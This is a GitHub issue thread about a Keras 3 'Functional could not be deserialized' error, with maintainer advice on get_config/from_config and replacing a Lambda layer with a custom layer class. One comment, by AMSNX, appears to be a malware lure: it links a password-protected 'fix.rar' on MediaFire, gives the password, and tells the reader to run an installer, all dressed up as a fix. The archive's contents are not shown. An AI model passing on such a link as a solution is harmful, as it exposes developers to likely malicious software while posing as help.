### ISSUE TITLE
Keras model deserialization issue 

### ISSUE THREAD

**Issue by chenshenmsft** [keras-team/keras#20167]
I trained a model using Keras and saved it, while loading it back, it ran into a deserialization error
```
from keras.models import Model
from keras.layers import Input, Conv1D, Dense, Dropout, Lambda, concatenate
from keras.optimizers import Adam
```

```
model.save('./0813debugmodel.keras')
```
model save runs okay

```
from keras.models import load_model
model = load_model('./0813debugmodel.keras')
```

> "<class 'keras.src.models.functional.Functional'> could not be deserialized properly. Please ensure that components that are Python object instances (layers, models, etc.) returned by `get_config()` are explicitly deserialized in the model's `from_config()` method.

I'm using python 3.11, keras 3.4.0.

How can I resolve this?

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sachinprasadhs** [comment]
If you have any custom object, other than any of the Python objects, you need to explicitly serialize and deserialize using `get_config` and `from_config` respectively.
https://keras.io/api/models/model_saving_apis/model_config_serialization/

For more options and details follow: https://keras.io/guides/serialization_and_saving/#custom-objects

**Comment by chenshenmsft** [comment]
Believe the model didn't use any custom objects.

To my surprise, this issue somehow disappeared by adding
`from tensorflow import keras`
and changing from 
`model.compile(Adam(), loss="mae",  metrics=["mse", "mape"]) `
to  
`model.compile(optimizer='adam', loss='mae', metrics=['mse', 'mape'])`
and using keras 2.12.0

**Comment by ghsanti** [comment]
> from keras.layers import Lambda, concatenate, ...

Lambda Layers [have deserialisation limitations.](https://keras.io/api/layers/core_layers/lambda/)

![Screenshot 2024-08-30 122417](https://github.com/user-attachments/assets/3d1edef6-d63c-4fd1-8790-6a2bb28302ab)

Try _replacing it by a class custom class_ (it's pretty easy to create, just check the docs for custom classes.)

If the error persist please include a minimal code reproducing the error to test what exactly is causing the issue.

**Comment by chenshenmsft** [comment]
replacing the lambda layer using a customer class is indeed a must to have this run in keras 3.3, otherwise, the deserialization error will persist in 3.3.

To write the custom class I asked GPT's help and it worked. Prompt used: 

> show me how to write a lambda layer in keras model as custom layer, my lambda layer is like this:  def slice(x, seq_length):
    return x[:,-seq_length:,:]
pred_seq_train = Lambda(slice, arguments={"seq_length":168})(x)
